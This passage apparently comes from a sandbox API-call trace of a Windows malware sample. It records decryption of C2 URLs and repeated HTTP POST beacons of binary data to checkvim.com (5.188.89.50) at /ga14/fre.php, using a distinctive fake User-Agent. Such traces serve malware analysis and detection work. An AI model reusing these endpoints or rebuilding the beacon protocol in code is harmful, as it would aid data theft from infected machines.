(pAddrInfo=0x871420*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0244.104] GetProcessHeap () returned 0x840000 [0244.104] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fa40 [0244.104] GetProcessHeap () returned 0x840000 [0244.104] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0244.105] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0244.105] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0244.105] GetProcessHeap () returned 0x840000 [0244.106] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0244.106] GetProcessHeap () returned 0x840000 [0244.106] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0244.106] GetProcessHeap () returned 0x840000 [0244.106] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb48 [0244.106] GetProcessHeap () returned 0x840000 [0244.106] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0244.106] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0244.107] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0244.107] GetProcessHeap () returned 0x840000 [0244.107] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0244.107] GetProcessHeap () returned 0x840000 [0244.107] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0244.107] send (s=0x350, buf=0x873a58*, len=237, flags=0) returned 237 [0244.107] send (s=0x350, buf=0x87eb58*, len=159, flags=0) returned 159 [0244.108] GetProcessHeap () returned 0x840000 [0244.108] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0244.108] recv (in: s=0x350, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0244.500] GetProcessHeap () returned 0x840000 [0244.500] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0244.500] GetProcessHeap () returned 0x840000 [0244.500] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0244.500] GetProcessHeap () returned 0x840000 [0244.500] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0244.500] GetProcessHeap () returned 0x840000 [0244.500] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fa40 | out: hHeap=0x840000) returned 1 [0244.500] closesocket (s=0x350) returned 0 [0244.501] GetProcessHeap () returned 0x840000 [0244.501] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871be8 | out: hHeap=0x840000) returned 1 [0244.501] GetProcessHeap () returned 0x840000 [0244.501] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0244.501] GetProcessHeap () returned 0x840000 [0244.501] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0244.501] GetProcessHeap () returned 0x840000 [0244.501] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8712e0 | out: hHeap=0x840000) returned 1 [0244.501] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xd64) returned 0x350 [0244.503] Sleep (dwMilliseconds=0xea60) [0244.504] GetProcessHeap () returned 0x840000 [0244.504] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc68 [0244.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0244.508] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0244.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0244.531] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0244.538] GetProcessHeap () returned 0x840000 [0244.538] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0244.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0244.539] CryptImportKey (in: hProv=0x86fa40, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e830) returned 1 [0244.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0244.540] CryptSetKeyParam (hKey=0x87e830, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0244.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0244.541] CryptSetKeyParam (hKey=0x87e830, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.541] GetProcessHeap () returned 0x840000 [0244.541] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0244.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0244.542] CryptDecrypt (in: hKey=0x87e830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc68, pdwDataLen=0x19f9a4 | out: pbData=0x87fc68, pdwDataLen=0x19f9a4) returned 1 [0244.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0244.543] CryptDestroyKey (hKey=0x87e830) returned 1 [0244.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0244.544] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0244.544] GetProcessHeap () returned 0x840000 [0244.544] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0244.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0244.545] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0244.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0244.546] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0244.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0244.547] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0244.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0244.548] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0244.548] GetProcessHeap () returned 0x840000 [0244.548] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8714e8 [0244.548] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0244.548] GetProcessHeap () returned 0x840000 [0244.548] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8714e8 | out: hHeap=0x840000) returned 1 [0244.548] GetProcessHeap () returned 0x840000 [0244.548] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0244.548] GetProcessHeap () returned 0x840000 [0244.548] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc68 | out: hHeap=0x840000) returned 1 [0244.548] GetProcessHeap () returned 0x840000 [0244.548] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fd40 [0244.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0244.551] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0244.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0244.557] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f798) returned 1 [0244.565] GetProcessHeap () returned 0x840000 [0244.566] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0244.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0244.569] CryptImportKey (in: hProv=0x86f798, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0244.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0244.571] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0244.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0244.574] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.574] GetProcessHeap () returned 0x840000 [0244.574] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0244.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0244.576] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fd40, pdwDataLen=0x19f9a4 | out: pbData=0x87fd40, pdwDataLen=0x19f9a4) returned 1 [0244.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0244.578] CryptDestroyKey (hKey=0x87e270) returned 1 [0244.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0244.579] CryptReleaseContext (hProv=0x86f798, dwFlags=0x0) returned 1 [0244.579] GetProcessHeap () returned 0x840000 [0244.579] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0244.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0244.580] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0244.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0244.581] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0244.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0244.582] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0244.582] GetProcessHeap () returned 0x840000 [0244.582] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871240 [0244.583] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0244.584] GetProcessHeap () returned 0x840000 [0244.584] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b38 [0244.584] socket (af=2, type=1, protocol=6) returned 0x354 [0244.584] connect (s=0x354, name=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0244.658] FreeAddrInfoW (pAddrInfo=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0244.658] GetProcessHeap () returned 0x840000 [0244.658] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0244.658] GetProcessHeap () returned 0x840000 [0244.658] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0244.658] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0244.659] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0244.659] GetProcessHeap () returned 0x840000 [0244.659] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0244.659] GetProcessHeap () returned 0x840000 [0244.659] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0244.659] GetProcessHeap () returned 0x840000 [0244.659] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f710 [0244.659] GetProcessHeap () returned 0x840000 [0244.659] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0244.660] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0244.661] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0244.661] GetProcessHeap () returned 0x840000 [0244.661] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0244.661] GetProcessHeap () returned 0x840000 [0244.661] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0244.661] send (s=0x354, buf=0x873a58*, len=237, flags=0) returned 237 [0244.662] send (s=0x354, buf=0x87eb58*, len=159, flags=0) returned 159 [0244.662] GetProcessHeap () returned 0x840000 [0244.662] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0244.662] recv (in: s=0x354, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0245.070] GetProcessHeap () returned 0x840000 [0245.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0245.070] GetProcessHeap () returned 0x840000 [0245.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0245.070] GetProcessHeap () returned 0x840000 [0245.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0245.070] GetProcessHeap () returned 0x840000 [0245.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0245.070] closesocket (s=0x354) returned 0 [0245.071] GetProcessHeap () returned 0x840000 [0245.071] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b38 | out: hHeap=0x840000) returned 1 [0245.071] GetProcessHeap () returned 0x840000 [0245.071] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0245.071] GetProcessHeap () returned 0x840000 [0245.071] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd40 | out: hHeap=0x840000) returned 1 [0245.072] GetProcessHeap () returned 0x840000 [0245.072] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871240 | out: hHeap=0x840000) returned 1 [0245.075] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xa24) returned 0x354 [0245.078] Sleep (dwMilliseconds=0xea60) [0245.083] GetProcessHeap () returned 0x840000 [0245.083] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0245.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.084] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0245.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.093] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0245.099] GetProcessHeap () returned 0x840000 [0245.099] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0245.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.100] CryptImportKey (in: hProv=0x86fa40, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e630) returned 1 [0245.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.106] CryptSetKeyParam (hKey=0x87e630, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0245.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.107] CryptSetKeyParam (hKey=0x87e630, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.107] GetProcessHeap () returned 0x840000 [0245.107] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0245.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.108] CryptDecrypt (in: hKey=0x87e630, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0245.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.109] CryptDestroyKey (hKey=0x87e630) returned 1 [0245.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.110] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0245.110] GetProcessHeap () returned 0x840000 [0245.110] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0245.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0245.111] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0245.111] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0245.112] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0245.112] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0245.113] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0245.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0245.113] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0245.113] GetProcessHeap () returned 0x840000 [0245.113] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0245.114] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0245.114] GetProcessHeap () returned 0x840000 [0245.114] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0245.114] GetProcessHeap () returned 0x840000 [0245.114] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0245.114] GetProcessHeap () returned 0x840000 [0245.114] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0245.114] GetProcessHeap () returned 0x840000 [0245.114] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f830 [0245.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.115] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0245.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.120] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0245.127] GetProcessHeap () returned 0x840000 [0245.127] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0245.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.128] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3b0) returned 1 [0245.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.129] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0245.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.130] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.130] GetProcessHeap () returned 0x840000 [0245.130] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0245.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.131] CryptDecrypt (in: hKey=0x87e3b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f830, pdwDataLen=0x19f9a4 | out: pbData=0x87f830, pdwDataLen=0x19f9a4) returned 1 [0245.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.132] CryptDestroyKey (hKey=0x87e3b0) returned 1 [0245.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.133] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0245.133] GetProcessHeap () returned 0x840000 [0245.133] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0245.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0245.134] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0245.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0245.135] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0245.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0245.136] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0245.136] GetProcessHeap () returned 0x840000 [0245.136] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0245.136] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0245.138] GetProcessHeap () returned 0x840000 [0245.138] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bc8 [0245.138] socket (af=2, type=1, protocol=6) returned 0x358 [0245.138] connect (s=0x358, name=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0245.305] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0245.305] GetProcessHeap () returned 0x840000 [0245.305] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0245.305] GetProcessHeap () returned 0x840000 [0245.305] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0245.306] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0245.307] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0245.307] GetProcessHeap () returned 0x840000 [0245.307] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0245.307] GetProcessHeap () returned 0x840000 [0245.307] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0245.307] GetProcessHeap () returned 0x840000 [0245.307] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fcf8 [0245.307] GetProcessHeap () returned 0x840000 [0245.307] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0245.310] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0245.311] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php 